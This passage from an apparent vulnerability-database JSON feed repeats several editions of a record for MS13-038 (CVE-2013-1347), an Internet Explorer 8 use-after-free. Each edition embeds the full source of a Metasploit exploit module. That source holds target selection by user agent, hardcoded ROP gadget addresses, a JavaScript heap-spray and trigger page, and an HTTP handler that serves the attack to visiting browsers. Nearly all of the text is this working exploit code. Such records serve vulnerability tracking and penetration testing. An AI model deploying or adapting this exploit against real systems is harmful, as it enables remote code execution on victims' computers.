supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-09T01:37:21", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-26T10:05:32", "history": [], "viewCount": 49, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-26T10:05:32", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-26T12:04:54", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 9.0, "modified": "2017-11-26T12:04:54"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-11-26T12:04:54", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-01-04T11:57:56", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 9.0, "modified": "2018-01-04T11:57:56"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-01-04T11:57:56", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-01-04T17:56:36", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-01-04T17:56:36"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object 